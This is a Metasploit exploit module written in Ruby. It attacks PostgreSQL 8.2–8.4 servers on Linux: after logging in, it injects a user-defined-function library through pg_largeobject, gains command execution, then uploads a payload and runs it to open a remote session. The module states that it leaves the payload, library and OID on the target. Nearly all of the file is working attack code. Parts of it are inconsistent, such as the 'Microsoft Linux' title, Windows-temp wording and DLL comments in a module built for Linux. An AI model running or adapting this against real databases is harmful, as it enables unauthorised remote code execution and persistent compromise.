###
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Postgres

	# Creates an instance of this module.
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'PostgreSQL for Microsoft Linux Payload Execution',
			'Description'    => %q{
				This module creates and enables a custom UDF (user defined function) on the
				target host via the UPDATE pg_largeobject method of binary injection. On
				default Microsoft Linux installations of PostgreSQL (=< 8.4), the postgres
				service account may write to the Windows temp directory, and may source
				UDF Shared Libraries's from there as well.

				PostgreSQL versions 8.2.x, 8.3.x, and 8.4.x on are valid targets for this module.

				NOTE: This module will leave a payload executable on the target system when the
				attack is finished, as well as the UDF SO and the OID.
			},
			'Author'         =>
			[
				'midnitesnake' # this Metasploit module
			],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'URL', 'http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt'
					]
				],
			'Platform'       => 'unix',
			'Arch'		=> ARCH_CMD,
			'Payload'        =>
				{
					'Space'    => 0x65535,
					'DisableNops'  => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'perl',
						}
				},
			'Targets'        =>
			[
				[ 'Automatic', { } ],
			],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'June 5 2007'

			))

                        register_options(
                               [
                                       OptEnum.new('BITS',[true,'The architecture of the operating system X86(32) / or X86_64(64) bit OS','32',['32','64']])
                               ],self.class)


		deregister_options('SQL', 'RETURN_ROWSET')
	end

	# Buncha stuff to make typing easier.
	def username; datastore['USERNAME']; end
	def password; datastore['PASSWORD']; end
	def database; datastore['DATABASE']; end
	def verbose; datastore['VERBOSE']; end
	def rhost; datastore['RHOST']; end
	def rport; datastore['RPORT']; end
	def bits; datastore['BITS'];end

	def execute_command(cmd, opts)
		postgres_sys_exec(cmd)
	end

	def exploit
		version = get_version(username,password,database)
		case version
		when :nocompat; print_error "Authentication successful, but not a compatable version."
		when :noauth; print_error "Authentication failed."
		when :noconn; print_error "Connection failed."
		end
		return unless version =~ /8\.[234]/
		print_status "Authentication successful and vulnerable version #{version} on Linux confirmed."
		tbl,fld,so,oid = postgres_upload_binary_file_linux(so_fname(version))
		unless tbl && fld && so && oid
			print_error "Could not upload the UDF SO"
			return
		end

		print_status "Uploaded #{so} as OID #{oid} to table #{tbl}(#{fld})"
		ret_sys_exec = postgres_create_sys_exec_linux(so)
		if ret_sys_exec
			if @postgres_conn
				print_status "Success"
								
				tbl,fld,myexploit,oid = postgres_upload_binary_file_elf("#!/bin/sh\n" + payload.encode)
		                unless tbl && fld && myexploit && oid
                		        print_error "Could not upload the PAYLOAD"
                        		return
                		end
				print_status "Uploaded #{myexploit} as OID #{oid} to table #{tbl}(#{fld})"
				postgres_sys_exec("chmod 755 #{myexploit}")
				postgres_sys_exec("#{myexploit}")
                		handler
				postgres_logout if @postgres_conn
			else
				print_error "Lost connection."
				return
			end
		end
		postgres_logout if @postgres_conn

	end

	def so_fname(version)
		print_status "Using #{version}/#{bits}/lib_postgresqludf_sys.so"
		File.join(Msf::Config.install_root,"data","exploits","postgres",version,bits,"lib_postgresqludf_sys.so")
	end

	# A shorter version of do_fingerprint from the postgres_version scanner
	# module, specifically looking for versions that valid targets for this
	# module.
	def get_version(user=nil,pass=nil,database=nil)
		begin
			msg = "#{rhost}:#{rport} Postgres -"
			password = pass || postgres_password
			vprint_status("Trying username:'#{user}' with password:'#{password}' against #{rhost}:#{rport} on database '#{database}'")
			result = postgres_fingerprint(
				:db => database,
				:username => user,
				:password => password
			)
			if result[:auth]
				# So, the only versions we have DLL binaries for are PostgreSQL 8.2, 8.3, and 8.4
				# This also checks to see if it was compiled with a windows-based compiler --
				# the stock Postgresql downloads are Visual C++ for 8.4 and 8.3, and GCC for mingw)
				# Also, the method to write files to disk doesn't appear to work on 9.0, so
				# tabling that version for now.
				#if result[:auth] =~ /PostgreSQL (8\.[234]).*(Visual C\+\+|mingw|cygwin)/i
				if result[:auth] =~ /PostgreSQL (8\.[234]).*/i
					return $1
				else
					print_status "Found #{result[:auth]}"
					return :nocompat
				end
			else
				return :noauth
			end
		rescue Rex::ConnectionError
			vprint_error "#{rhost}:#{rport} Connection Error: #{$!}"
			return :noconn
		end
	end

end